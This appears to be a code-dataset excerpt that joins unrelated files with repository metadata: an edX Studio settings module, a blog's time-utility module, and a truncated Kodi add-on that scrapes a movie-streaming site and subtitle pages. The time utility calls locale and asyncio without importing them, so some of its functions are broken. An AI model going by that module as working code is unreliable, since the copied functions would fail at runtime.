self.execute(self.end)
return retcode
def post_process(self, retcode):
if self.postprocess:
self.execute(self.postprocess)
return retcode
def execute(self, cmd):
'''
Execute and check exit code
'''
self.log.info("Executing: %s", cmd)
retcode = util.execute(
cmd, shell=True, poll_period=0.1, catch_out=self.catch_out)[0]
if retcode:
raise RuntimeError("Subprocess returned %s" % retcode)
| lgpl-2.1 | 941,401,629,749,793,200 | 27.936709 | 79 | 0.559055 | false |
chrisfilda/edx_platform | cms/envs/common.py | 1 | 18237 | # -*- coding: utf-8 -*-
"""
This is the common settings file, intended to set sane defaults. If you have a
piece of configuration that's dependent on a set of feature flags being set,
then create a function that returns the calculated value based on the value of
FEATURES[...]. Modules that extend this one can change the feature
configuration in an environment specific config file and re-calculate those
values.
We should make a method that calls all these config methods so that you just
make one call at the end of your site-specific dev file to reset all the
dependent variables (like INSTALLED_APPS) for you.
Longer TODO:
1. Right now our treatment of static content in general and in particular
course-specific static content is haphazard.
2. We should have a more disciplined approach to feature flagging, even if it
just means that we stick them in a dict called FEATURES.
3. We need to handle configuration for multiple courses. This could be as
multiple sites, but we do need a way to map their data assets.
"""
# We intentionally define lots of variables that aren't used, and
# want to import all variables from base settings files
# pylint: disable=W0401, W0611, W0614
import imp
import sys
import lms.envs.common
from lms.envs.common import (
USE_TZ, TECH_SUPPORT_EMAIL, PLATFORM_NAME, BUGS_EMAIL, DOC_STORE_CONFIG, ALL_LANGUAGES, WIKI_ENABLED
)
from path import path
from lms.lib.xblock.mixin import LmsBlockMixin
from cms.lib.xblock.mixin import CmsBlockMixin
from dealer.git import git
############################ FEATURE CONFIGURATION #############################
FEATURES = {
'USE_DJANGO_PIPELINE': True,
'GITHUB_PUSH': False,
# for consistency in user-experience, keep the value of the following 3 settings
# in sync with the ones in lms/envs/common.py
'ENABLE_DISCUSSION_SERVICE': True,
'ENABLE_TEXTBOOK': True,
'ENABLE_STUDENT_NOTES': True,
'AUTH_USE_CERTIFICATES': False,
# email address for studio staff (eg to request course creation)
'STUDIO_REQUEST_EMAIL': '',
'STUDIO_NPS_SURVEY': True,
# Segment.io - must explicitly turn it on for production
'SEGMENT_IO': False,
# Enable URL that shows information about the status of various services
'ENABLE_SERVICE_STATUS': False,
# Don't autoplay videos for course authors
'AUTOPLAY_VIDEOS': False,
# If set to True, new Studio users won't be able to author courses unless
# edX has explicitly added them to the course creator group.
'ENABLE_CREATOR_GROUP': False,
# whether to use password policy enforcement or not
'ENFORCE_PASSWORD_POLICY': False,
# If set to True, Studio won't restrict the set of advanced components
# to just those pre-approved by edX
'ALLOW_ALL_ADVANCED_COMPONENTS': False,
# Turn off account locking if failed login attempts exceeds a limit
'ENABLE_MAX_FAILED_LOGIN_ATTEMPTS': False,
# Allow editing of short description in course settings in cms
'EDITABLE_SHORT_DESCRIPTION': True,
# Hide any Personally Identifiable Information from application logs
'SQUELCH_PII_IN_LOGS': False,
# Toggles embargo functionality
'EMBARGO': False,
# Turn on/off Microsites feature
'USE_MICROSITES': False,
# Allow creating courses with non-ascii characters in the course id
'ALLOW_UNICODE_COURSE_ID': False,
# Prevent concurrent logins per user
'PREVENT_CONCURRENT_LOGINS': False,
# Turn off Advanced Security by default
'ADVANCED_SECURITY': False,
# Temporary feature flag for duplicating xblock leaves
'ENABLE_DUPLICATE_XBLOCK_LEAF_COMPONENT': False,
# Temporary feature flag for deleting xblock leaves
'ENABLE_DELETE_XBLOCK_LEAF_COMPONENT': False,
}
ENABLE_JASMINE = False
############################# SET PATH INFORMATION #############################
PROJECT_ROOT = path(__file__).abspath().dirname().dirname() # /edx-platform/cms
REPO_ROOT = PROJECT_ROOT.dirname()
COMMON_ROOT = REPO_ROOT / "common"
LMS_ROOT = REPO_ROOT / "lms"
ENV_ROOT = REPO_ROOT.dirname() # virtualenv dir /edx-platform is in
GITHUB_REPO_ROOT = ENV_ROOT / "data"
sys.path.append(REPO_ROOT)
sys.path.append(PROJECT_ROOT / 'djangoapps')
sys.path.append(COMMON_ROOT / 'djangoapps')
sys.path.append(COMMON_ROOT / 'lib')
# For geolocation ip database
GEOIP_PATH = REPO_ROOT / "common/static/data/geoip/GeoIP.dat"
############################# WEB CONFIGURATION #############################
# This is where we stick our compiled template files.
from tempdir import mkdtemp_clean
MAKO_MODULE_DIR = mkdtemp_clean('mako')
MAKO_TEMPLATES = {}
MAKO_TEMPLATES['main'] = [
PROJECT_ROOT / 'templates',
COMMON_ROOT / 'templates',
COMMON_ROOT / 'djangoapps' / 'pipeline_mako' / 'templates',
COMMON_ROOT / 'djangoapps' / 'pipeline_js' / 'templates',
]
for namespace, template_dirs in lms.envs.common.MAKO_TEMPLATES.iteritems():
MAKO_TEMPLATES['lms.' + namespace] = template_dirs
TEMPLATE_DIRS = MAKO_TEMPLATES['main']
EDX_ROOT_URL = ''
LOGIN_REDIRECT_URL = EDX_ROOT_URL + '/signin'
LOGIN_URL = EDX_ROOT_URL + '/signin'
TEMPLATE_CONTEXT_PROCESSORS = (
'django.core.context_processors.request',
'django.core.context_processors.static',
'django.contrib.messages.context_processors.messages',
'django.core.context_processors.i18n',
'django.contrib.auth.context_processors.auth', # this is required for admin
'django.core.context_processors.csrf',
'dealer.contrib.django.staff.context_processor', # access git revision
'contentstore.context_processors.doc_url',
)
# use the ratelimit backend to prevent brute force attacks
AUTHENTICATION_BACKENDS = (
'ratelimitbackend.backends.RateLimitModelBackend',
)
LMS_BASE = None
#################### CAPA External Code Evaluation #############################
XQUEUE_INTERFACE = {
'url': 'http://localhost:8888',
'django_auth': {'username': 'local',
'password': 'local'},
'basic_auth': None,
}
################################# Middleware ###################################
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'staticfiles.finders.FileSystemFinder',
'staticfiles.finders.AppDirectoriesFinder',
'pipeline.finders.PipelineFinder',
)
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
MIDDLEWARE_CLASSES = (
'request_cache.middleware.RequestCache',
'django.middleware.cache.UpdateCacheMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'method_override.middleware.MethodOverrideMiddleware',
# Instead of AuthenticationMiddleware, we use a cache-backed version
'cache_toolbox.middleware.CacheBackedAuthenticationMiddleware',
'student.middleware.UserStandingMiddleware',
'contentserver.middleware.StaticContentServer',
'crum.CurrentRequestUserMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'track.middleware.TrackMiddleware',
# Allows us to dark-launch particular languages
'dark_lang.middleware.DarkLangMiddleware',
'embargo.middleware.EmbargoMiddleware',
# Detects user-requested locale from 'accept-language' header in http request
'django.middleware.locale.LocaleMiddleware',
'django.middleware.transaction.TransactionMiddleware',
# needs to run after locale middleware (or anything that modifies the request context)
'edxmako.middleware.MakoMiddleware',
# catches any uncaught RateLimitExceptions and returns a 403 instead of a 500
'ratelimitbackend.middleware.RateLimitMiddleware',
# for expiring inactive sessions
'session_inactivity_timeout.middleware.SessionInactivityTimeout',
# use Django built in clickjacking protection
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
# Clickjacking protection can be enabled by setting this to 'DENY'
X_FRAME_OPTIONS = 'ALLOW'
############# XBlock Configuration ##########
# Import after sys.path fixup
from xmodule.modulestore.inheritance import InheritanceMixin
from xmodule.modulestore import prefer_xmodules
from xmodule.x_module import XModuleMixin
# This should be moved into an XBlock Runtime/Application object
# once the responsibility of XBlock creation is moved out of modulestore - cpennington
XBLOCK_MIXINS = (LmsBlockMixin, CmsBlockMixin, InheritanceMixin, XModuleMixin)
# Allow any XBlock in Studio
# You should also enable the ALLOW_ALL_ADVANCED_COMPONENTS feature flag, so that
# xblocks can be added via advanced settings
XBLOCK_SELECT_FUNCTION = prefer_xmodules
############################ DJANGO_BUILTINS ################################
# Change DEBUG/TEMPLATE_DEBUG in your environment settings files, not here
DEBUG = False
TEMPLATE_DEBUG = False
# Site info
SITE_ID = 1
SITE_NAME = "localhost:8001"
HTTPS = 'on'
ROOT_URLCONF = 'cms.urls'
# Email
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
EMAIL_HOST = 'localhost'
EMAIL_PORT = 25
EMAIL_USE_TLS = False
EMAIL_HOST_USER = ''
EMAIL_HOST_PASSWORD = ''
DEFAULT_FROM_EMAIL = '[email protected]'
DEFAULT_FEEDBACK_EMAIL = '[email protected]'
SERVER_EMAIL = '[email protected]'
ADMINS = ()
MANAGERS = ADMINS
# Static content
STATIC_URL = '/static/' + git.revision + "/"
ADMIN_MEDIA_PREFIX = '/static/admin/'
STATIC_ROOT = ENV_ROOT / "staticfiles" / git.revision
STATICFILES_DIRS = [
COMMON_ROOT / "static",
PROJECT_ROOT / "static",
LMS_ROOT / "static",
# This is how you would use the textbook images locally
# ("book", ENV_ROOT / "book_images"),
]
# Locale/Internationalization
TIME_ZONE = 'America/New_York' # http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
LANGUAGE_CODE = 'en' # http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGES = lms.envs.common.LANGUAGES
USE_I18N = True
USE_L10N = True
# Localization strings (e.g. django.po) are under this directory
LOCALE_PATHS = (REPO_ROOT + '/conf/locale',) # edx-platform/conf/locale/
# Messages
MESSAGE_STORAGE = 'django.contrib.messages.storage.session.SessionStorage'
############################### Pipeline #######################################
STATICFILES_STORAGE = 'pipeline.storage.PipelineCachedStorage'
from rooted_paths import rooted_glob
PIPELINE_CSS = {
'style-vendor': {
'source_filenames': [
'css/vendor/normalize.css',
'css/vendor/font-awesome.css',
'css/vendor/html5-input-polyfills/number-polyfill.css',
'js/vendor/CodeMirror/codemirror.css',
'css/vendor/ui-lightness/jquery-ui-1.8.22.custom.css',
'css/vendor/jquery.qtip.min.css',
'js/vendor/markitup/skins/simple/style.css',
'js/vendor/markitup/sets/wiki/style.css',
],
'output_filename': 'css/cms-style-vendor.css',
},
'style-vendor-tinymce-content': {
'source_filenames': [
'css/tinymce-studio-content-fonts.css',
'js/vendor/tinymce/js/tinymce/skins/studio-tmce4/content.min.css',
'css/tinymce-studio-content.css'
],
'output_filename': 'css/cms-style-vendor-tinymce-content.css',
},
'style-vendor-tinymce-skin': {
'source_filenames': [
'js/vendor/tinymce/js/tinymce/skins/studio-tmce4/skin.min.css'
],
'output_filename': 'css/cms-style-vendor-tinymce-skin.css',
},
'style-app': {
'source_filenames': [
'sass/style-app.css',
],
'output_filename': 'css/cms-style-app.css',
},
'style-app-extend1': {
'source_filenames': [
'sass/style-app-extend1.css',
],
'output_filename': 'css/cms-style-app-extend1.css',
},
'style-xmodule': {
'source_filenames': [
'sass/style-xmodule.css',
],
'output_filename': 'css/cms-style-xmodule.css',
},
}
# test_order: Determines the position of this chunk of javascript on
# the jasmine test page
PIPELINE_JS = {
'module-js': {
'source_filenames': (
rooted_glob(COMMON_ROOT / 'static/', 'xmodule/descriptors/js/*.js') +
rooted_glob(COMMON_ROOT / 'static/', 'xmodule/modules/js/*.js') +
rooted_glob(COMMON_ROOT / 'static/', 'coffee/src/discussion/*.js')
),
'output_filename': 'js/cms-modules.js',
'test_order': 1
},
}
PIPELINE_COMPILERS = (
'pipeline.compilers.coffee.CoffeeScriptCompiler',
)
PIPELINE_CSS_COMPRESSOR = None
PIPELINE_JS_COMPRESSOR = None
STATICFILES_IGNORE_PATTERNS = (
"*.py",
"*.pyc"
# it would be nice if we could do, for example, "**/*.scss",
# but these strings get passed down to the `fnmatch` module,
# which doesn't support that. :(
# http://docs.python.org/2/library/fnmatch.html
"sass/*.scss",
"sass/*/*.scss",
"sass/*/*/*.scss",
"sass/*/*/*/*.scss",
"coffee/*.coffee",
"coffee/*/*.coffee",
"coffee/*/*/*.coffee",
"coffee/*/*/*/*.coffee",
# Symlinks used by js-test-tool
"xmodule_js",
"common_static",
)
PIPELINE_YUI_BINARY = 'yui-compressor'
################################# CELERY ######################################
# Message configuration
CELERY_TASK_SERIALIZER = 'json'
CELERY_RESULT_SERIALIZER = 'json'
CELERY_MESSAGE_COMPRESSION = 'gzip'
# Results configuration
CELERY_IGNORE_RESULT = False
CELERY_STORE_ERRORS_EVEN_IF_IGNORED = True
# Events configuration
CELERY_TRACK_STARTED = True
CELERY_SEND_EVENTS = True
CELERY_SEND_TASK_SENT_EVENT = True
# Exchange configuration
CELERY_DEFAULT_EXCHANGE = 'edx.core'
CELERY_DEFAULT_EXCHANGE_TYPE = 'direct'
# Queues configuration
HIGH_PRIORITY_QUEUE = 'edx.core.high'
DEFAULT_PRIORITY_QUEUE = 'edx.core.default'
LOW_PRIORITY_QUEUE = 'edx.core.low'
CELERY_QUEUE_HA_POLICY = 'all'
CELERY_CREATE_MISSING_QUEUES = True
CELERY_DEFAULT_QUEUE = DEFAULT_PRIORITY_QUEUE
CELERY_DEFAULT_ROUTING_KEY = DEFAULT_PRIORITY_QUEUE
CELERY_QUEUES = {
HIGH_PRIORITY_QUEUE: {},
LOW_PRIORITY_QUEUE: {},
DEFAULT_PRIORITY_QUEUE: {}
}
############################## Video ##########################################
YOUTUBE = {
# YouTube JavaScript API
'API': 'www.youtube.com/iframe_api',
# URL to test YouTube availability
'TEST_URL': 'gdata.youtube.com/feeds/api/videos/',
# Current youtube api for requesting transcripts.
# For example: http://video.google.com/timedtext?lang=en&v=j_jEn79vS3g.
'TEXT_API': {
'url': 'video.google.com/timedtext',
'params': {
'lang': 'en',
'v': 'set_youtube_id_of_11_symbols_here',
},
},
}
############################ APPS #####################################
INSTALLED_APPS = (
# Standard apps
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'djcelery',
'south',
'method_override',
# Database-backed configuration
'config_models',
# Monitor the status of services
'service_status',
# Testing
'django_nose',
# For CMS
'contentstore',
'course_creators',
'student', # misleading name due to sharing with lms
'course_groups', # not used in cms (yet), but tests run
# Tracking
'track',
'eventtracking.django',
# Monitoring
'datadog',
# For asset pipelining
'edxmako',
'pipeline',
'staticfiles',
'static_replace',
# comment common
'django_comment_common',
# for course creator table
'django.contrib.admin',
# for managing course modes
'course_modes',
# Dark-launching languages
'dark_lang',
# Student identity reverification
'reverification',
# User preferences
'user_api',
'django_openid_auth',
'embargo',
# Monitoring signals
'monitoring',
)
################# EDX MARKETING SITE ##################################
EDXMKTG_COOKIE_NAME = 'edxloggedin'
MKTG_URLS = {}
MKTG_URL_LINK_MAP = {
}
COURSES_WITH_UNSAFE_CODE = []
############################## EVENT TRACKING #################################
TRACK_MAX_EVENT = 50000
TRACKING_BACKENDS = {
'logger': {
'ENGINE': 'track.backends.logger.LoggerBackend',
'OPTIONS': {
'name': 'tracking'
}
}
}
# We're already logging events, and we don't want to capture user
# names/passwords. Heartbeat events are likely not interesting.
TRACKING_IGNORE_URL_PATTERNS = [r'^/event', r'^/login', r'^/heartbeat']
EVENT_TRACKING_ENABLED = True
EVENT_TRACKING_BACKENDS = {
'logger': {
'ENGINE': 'eventtracking.backends.logger.LoggerBackend',
'OPTIONS': {
'name': 'tracking',
'max_event_size': TRACK_MAX_EVENT,
}
}
}
EVENT_TRACKING_PROCESSORS = [
{
'ENGINE': 'track.shim.LegacyFieldMappingProcessor'
}
]
#### PASSWORD POLICY SETTINGS #####
PASSWORD_MIN_LENGTH = None
PASSWORD_MAX_LENGTH = None
PASSWORD_COMPLEXITY = {}
PASSWORD_DICTIONARY_EDIT_DISTANCE_THRESHOLD = None
PASSWORD_DICTIONARY = []
##### ACCOUNT LOCKOUT DEFAULT PARAMETERS #####
MAX_FAILED_LOGIN_ATTEMPTS_ALLOWED = 5
MAX_FAILED_LOGIN_ATTEMPTS_LOCKOUT_PERIOD_SECS = 15 * 60
### Apps only installed in some instances
OPTIONAL_APPS = (
'edx_jsdraw',
'mentoring',
# edx-ora2
'submissions',
'openassessment',
'openassessment.assessment',
'openassessment.workflow',
'openassessment.xblock'
)
for app_name in OPTIONAL_APPS:
# First attempt to only find the module rather than actually importing it,
# to avoid circular references - only try to import if it can't be found
# by find_module, which doesn't work with import hooks
try:
imp.find_module(app_name)
except ImportError:
try:
__import__(app_name)
except ImportError:
continue
INSTALLED_APPS += (app_name,)
### ADVANCED_SECURITY_CONFIG
# Empty by default
ADVANCED_SECURITY_CONFIG = {}
| agpl-3.0 | -6,069,792,571,519,737,000 | 28.319936 | 104 | 0.659264 | false |
Jackeriss/Typora-Blog | app/util/time_util.py | 1 | 3493 | import functools
import logging
import time
from datetime import datetime
import pytz
from app.util.config_util import config
def str2datetime(value, default=None, time_format="%Y-%m-%d %H:%M:%S"):
try:
return datetime.strptime(value, time_format)
except Exception as exception:
logging.exception(f"str2datetime failed!value:{value} exception:{exception}")
return default
def time_str2timestamp(time_str):
if ":" in time_str:
if "/" in time_str:
return (
time_str.split("/")[0],
time.mktime(
datetime.strptime(time_str, "%Y/%m/%d %H:%M:%S").timetuple()
),
)
return (
time_str.split("-")[0],
time.mktime(datetime.strptime(time_str, "%Y-%m-%d %H:%M:%S").timetuple()),
)
elif "/" in time_str:
return (
time_str.split("/")[0],
time.mktime(datetime.strptime(time_str, "%Y/%m/%d %H-%M-%S").timetuple()),
)
else:
return (
time_str.split("-")[0],
time.mktime(datetime.strptime(time_str, "%Y-%m-%d %H-%M-%S").timetuple()),
)
def str2timestamp(value, default=0, time_format="%Y-%m-%d %H:%M:%S"):
try:
return datetime.strptime(value, time_format).timestamp() * 1000
except Exception as exception:
logging.exception(f"str2timestamp failed!value:{value} exception:{exception}")
return default
def timestamp2str(value, time_format="%Y-%m-%d %H:%M:%S"):
if not value:
return ""
try:
return datetime.fromtimestamp(value, pytz.UTC).strftime(time_format)
except Exception as exception:
logging.exception(f"timestamp2str failed!value:{value} exception:{exception}")
return ""
def datetime2str(value, default="", time_format="%Y-%m-%d %H:%M:%S"):
if not isinstance(value, datetime):
return default
try:
locale.setlocale(locale.LC_TIME, "en_US.UTF-8")
return value.strftime(time_format)
except Exception as exception:
logging.exception(f"datetime2str failed!value:{value} exception:{exception}")
return default
def timestamp():
""" 获取当前utc时间戳 """
return int(datetime.utcnow().timestamp())
def now():
""" 获取当前utc时间 """
return datetime.utcnow()
def timeout_log(timeout=10, tag="", debug=False):
""" 记录函数执行时间
timeout: 超过时长打印错误日志,单位(秒)
tag: 日志记录标签
"""
def decorator(func):
def _time_log(time_start, time_end, function_name):
if not debug and config.server["debug"]:
return
cost = (time_end - time_start).total_seconds()
if cost > timeout:
logging.error(f"TIME OUT:{tag}, function:{function_name}, cost:{cost}s")
@functools.wraps(func)
async def _async_wrapper(*args, **kwargs):
start = now()
result = await func(*args, **kwargs)
_time_log(start, now(), func.__name__)
return result
@functools.wraps(func)
def _sync_wrapper(*args, **kwargs):
start = now()
result = func(*args, **kwargs)
_time_log(start, now(), func.__name__)
return result
if asyncio.iscoroutinefunction(func):
return _async_wrapper
return _sync_wrapper
return decorator
| mit | 6,112,573,830,291,964,000 | 28.626087 | 88 | 0.57059 | false |
SMALLplayer/smallplayer-image-creator | storage/.xbmc/addons/plugin.video.muchmovies.hd/default.py | 1 | 51620 | # -*- coding: utf-8 -*-
'''
Much Movies HD XBMC Addon
Copyright (C) 2014 lambda
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import urllib,urllib2,re,os,threading,datetime,xbmc,xbmcplugin,xbmcgui,xbmcaddon,xbmcvfs
from operator import itemgetter
try: import json
except: import simplejson as json
try: import CommonFunctions
except: import commonfunctionsdummy as CommonFunctions
from metahandler import metahandlers
from metahandler import metacontainers
language = xbmcaddon.Addon().getLocalizedString
setSetting = xbmcaddon.Addon().setSetting
getSetting = xbmcaddon.Addon().getSetting
addonName = xbmcaddon.Addon().getAddonInfo("name")
addonVersion = xbmcaddon.Addon().getAddonInfo("version")
addonId = xbmcaddon.Addon().getAddonInfo("id")
addonPath = xbmcaddon.Addon().getAddonInfo("path")
addonDesc = language(30450).encode("utf-8")
addonIcon = os.path.join(addonPath,'icon.png')
addonFanart = os.path.join(addonPath,'fanart.jpg')
addonArt = os.path.join(addonPath,'resources/art')
addonDownloads = os.path.join(addonPath,'resources/art/Downloads.png')
addonPages = os.path.join(addonPath,'resources/art/Pages.png')
addonNext = os.path.join(addonPath,'resources/art/Next.png')
dataPath = xbmc.translatePath('special://profile/addon_data/%s' % (addonId))
viewData = os.path.join(dataPath,'views.cfg')
favData = os.path.join(dataPath,'favourites.cfg')
metaget = metahandlers.MetaData(preparezip=False)
common = CommonFunctions
action = None
class main:
def __init__(self):
global action
index().container_data()
params = {}
splitparams = sys.argv[2][sys.argv[2].find('?') + 1:].split('&')
for param in splitparams:
if (len(param) > 0):
splitparam = param.split('=')
key = splitparam[0]
try: value = splitparam[1].encode("utf-8")
except: value = splitparam[1]
params[key] = value
try: action = urllib.unquote_plus(params["action"])
except: action = None
try: name = urllib.unquote_plus(params["name"])
except: name = None
try: url = urllib.unquote_plus(params["url"])
except: url = None
try: image = urllib.unquote_plus(params["image"])
except: image = None
try: query = urllib.unquote_plus(params["query"])
except: query = None
try: title = urllib.unquote_plus(params["title"])
except: title = None
try: year = urllib.unquote_plus(params["year"])
except: year = None
try: imdb = urllib.unquote_plus(params["imdb"])
except: imdb = None
if action == None: root().get()
elif action == 'item_play': contextMenu().item_play()
elif action == 'item_random_play': contextMenu().item_random_play()
elif action == 'item_queue': contextMenu().item_queue()
elif action == 'favourite_add': contextMenu().favourite_add(favData, name, url, image, imdb)
elif action == 'favourite_from_search': contextMenu().favourite_from_search(favData, name, url, image, imdb)
elif action == 'favourite_delete': contextMenu().favourite_delete(favData, name, url)
elif action == 'favourite_moveUp': contextMenu().favourite_moveUp(favData, name, url)
elif action == 'favourite_moveDown': contextMenu().favourite_moveDown(favData, name, url)
elif action == 'playlist_open': contextMenu().playlist_open()
elif action == 'settings_open': contextMenu().settings_open()
elif action == 'addon_home': contextMenu().addon_home()
elif action == 'view_movies': contextMenu().view('movies')
elif action == 'metadata_movies': contextMenu().metadata('movie', name, url, imdb, '', '')
elif action == 'metadata_movies2': contextMenu().metadata('movie', name, url, imdb, '', '')
elif action == 'playcount_movies': contextMenu().playcount('movie', imdb, '', '')
elif action == 'library': contextMenu().library(name, url)
elif action == 'download': contextMenu().download(name, url)
elif action == 'trailer': contextMenu().trailer(name, url)
elif action == 'movies': movies().muchmovies(url)
elif action == 'movies_title': movies().muchmovies_title()
elif action == 'movies_release': movies().muchmovies_release()
elif action == 'movies_added': movies().muchmovies_added()
elif action == 'movies_rating': movies().muchmovies_rating()
elif action == 'movies_search': movies().muchmovies_search(query)
elif action == 'movies_favourites': favourites().movies()
elif action == 'pages_movies': pages().muchmovies()
elif action == 'genres_movies': genres().muchmovies()
elif action == 'play': resolver().run(url, name)
if action is None:
pass
elif action.startswith('movies'):
xbmcplugin.setContent(int(sys.argv[1]), 'movies')
index().container_view('movies', {'skin.confluence' : 500})
xbmcplugin.setPluginFanart(int(sys.argv[1]), addonFanart)
xbmcplugin.endOfDirectory(int(sys.argv[1]))
return
class getUrl(object):
def __init__(self, url, fetch=True, close=True, cookie=False, mobile=False, proxy=None, post=None, referer=None):
if not proxy is None:
proxy_handler = urllib2.ProxyHandler({'http':'%s' % (proxy)})
opener = urllib2.build_opener(proxy_handler, urllib2.HTTPHandler)
opener = urllib2.install_opener(opener)
if cookie == True:
import cookielib
cookie_handler = urllib2.HTTPCookieProcessor(cookielib.LWPCookieJar())
opener = urllib2.build_opener(cookie_handler, urllib2.HTTPBasicAuthHandler(), urllib2.HTTPHandler())
opener = urllib2.install_opener(opener)
if not post is None:
request = urllib2.Request(url, post)
else:
request = urllib2.Request(url,None)
if mobile == True:
request.add_header('User-Agent', 'Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_0 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8A293 Safari/6531.22.7')
else:
request.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0) Gecko/20100101 Firefox/6.0')
if not referer is None:
request.add_header('Referer', referer)
response = urllib2.urlopen(request, timeout=30)
if fetch == True:
result = response.read()
else:
result = response.geturl()
if close == True:
response.close()
self.result = result
class uniqueList(object):
def __init__(self, list):
uniqueSet = set()
uniqueList = []
for n in list:
if n not in uniqueSet:
uniqueSet.add(n)
uniqueList.append(n)
self.list = uniqueList
class Thread(threading.Thread):
def __init__(self, target, *args):
self._target = target
self._args = args
threading.Thread.__init__(self)
def run(self):
self._target(*self._args)
class player(xbmc.Player):
def __init__ (self):
self.property = addonName+'player_status'
xbmc.Player.__init__(self)
def status(self):
getProperty = index().getProperty(self.property)
index().clearProperty(self.property)
if not xbmc.getInfoLabel('Container.FolderPath') == '': return
if getProperty == 'true': return True
return
def run(self, name, url, imdb='0'):
if xbmc.getInfoLabel('Container.FolderPath').startswith(sys.argv[0]):
item = xbmcgui.ListItem(path=url)
xbmcplugin.setResolvedUrl(int(sys.argv[1]), True, item)
else:
try:
file = name + '.strm'
file = file.translate(None, '\/:*?"<>|')
meta = xbmc.executeJSONRPC('{"jsonrpc": "2.0", "method": "VideoLibrary.GetMovies", "params": {"properties" : ["title", "genre", "year", "rating", "director", "trailer", "tagline", "plot", "plotoutline", "originaltitle", "lastplayed", "playcount", "writer", "studio", "mpaa", "country", "imdbnumber", "runtime", "votes", "fanart", "thumbnail", "file", "sorttitle", "resume", "dateadded"]}, "id": 1}')
meta = unicode(meta, 'utf-8', errors='ignore')
meta = json.loads(meta)
meta = meta['result']['movies']
self.meta = [i for i in meta if i['file'].endswith(file)][0]
meta = {'title': self.meta['title'], 'originaltitle': self.meta['originaltitle'], 'year': self.meta['year'], 'genre': str(self.meta['genre']).replace("[u'", '').replace("']", '').replace("', u'", ' / '), 'director': str(self.meta['director']).replace("[u'", '').replace("']", '').replace("', u'", ' / '), 'country': str(self.meta['country']).replace("[u'", '').replace("']", '').replace("', u'", ' / '), 'rating': self.meta['rating'], 'votes': self.meta['votes'], 'mpaa': self.meta['mpaa'], 'duration': self.meta['runtime'], 'trailer': self.meta['trailer'], 'writer': str(self.meta['writer']).replace("[u'", '').replace("']", '').replace("', u'", ' / '), 'studio': str(self.meta['studio']).replace("[u'", '').replace("']", '').replace("', u'", ' / '), 'tagline': self.meta['tagline'], 'plotoutline': self.meta['plotoutline'], 'plot': self.meta['plot']}
poster = self.meta['thumbnail']
except:
meta = {'label' : name, 'title' : name}
poster = ''
item = xbmcgui.ListItem(path=url, iconImage="DefaultVideo.png", thumbnailImage=poster)
item.setInfo( type="Video", infoLabels= meta )
xbmcplugin.setResolvedUrl(int(sys.argv[1]), True, item)
for i in range(1, 21):
try: self.totalTime = self.getTotalTime()
except: self.totalTime = 0
if not self.totalTime == 0: continue
xbmc.sleep(1000)
if self.totalTime == 0: return
subtitles().get(name)
self.content = 'movie'
self.season = str(xbmc.getInfoLabel('VideoPlayer.season'))
self.episode = str(xbmc.getInfoLabel('VideoPlayer.episode'))
if imdb == '0': imdb = metaget.get_meta('movie', xbmc.getInfoLabel('VideoPlayer.title') ,year=str(xbmc.getInfoLabel('VideoPlayer.year')))['imdb_id']
imdb = re.sub("[^0-9]", "", imdb)
self.imdb = imdb
while True:
try: self.currentTime = self.getTime()
except: break
xbmc.sleep(1000)
def onPlayBackEnded(self):
if xbmc.getInfoLabel('Container.FolderPath') == '': index().setProperty(self.property, 'true')
if not self.currentTime / self.totalTime >= .9: return
if xbmc.getInfoLabel('Container.FolderPath').startswith(sys.argv[0]):
metaget.change_watched(self.content, '', self.imdb, season=self.season, episode=self.episode, year='', watched='')
index().container_refresh()
else:
try: xbmc.executeJSONRPC('{"jsonrpc": "2.0", "method": "VideoLibrary.SetMovieDetails", "params": {"movieid" : %s, "playcount" : 1 }, "id": 1 }' % str(self.meta['movieid']))
except: pass
def onPlayBackStopped(self):
index().clearProperty(self.property)
if not self.currentTime / self.totalTime >= .9: return
if xbmc.getInfoLabel('Container.FolderPath').startswith(sys.argv[0]):
metaget.change_watched(self.content, '', self.imdb, season=self.season, episode=self.episode, year='', watched='')
index().container_refresh()
else:
try: xbmc.executeJSONRPC('{"jsonrpc": "2.0", "method": "VideoLibrary.SetMovieDetails", "params": {"movieid" : %s, "playcount" : 1 }, "id": 1 }' % str(self.meta['movieid']))
except: pass
class subtitles:
def get(self, name):
subs = getSetting("subs")
if subs == '1': self.greek(name)
def greek(self, name):
try:
import shutil, zipfile, time
sub_tmp = os.path.join(dataPath,'sub_tmp')
sub_tmp2 = os.path.join(sub_tmp, "subs")
sub_stream = os.path.join(dataPath,'sub_stream')
sub_file = os.path.join(sub_tmp, 'sub_tmp.zip')
try: os.makedirs(dataPath)
except: pass
try: os.remove(sub_tmp)
except: pass
try: shutil.rmtree(sub_tmp)
except: pass
try: os.makedirs(sub_tmp)
except: pass
try: os.remove(sub_stream)
except: pass
try: shutil.rmtree(sub_stream)
except: pass
try: os.makedirs(sub_stream)
except: pass
subtitles = []
query = ''.join(e for e in name if e.isalnum() or e == ' ')
query = urllib.quote_plus(query)
url = 'http://www.greeksubtitles.info/search.php?name=' + query
result = getUrl(url).result
result = result.decode('iso-8859-7').encode('utf-8')
result = result.lower().replace('"',"'")
match = "get_greek_subtitles[.]php[?]id=(.+?)'.+?%s.+?<"
quality = ['bluray', 'brrip', 'bdrip', 'dvdrip', 'hdtv']
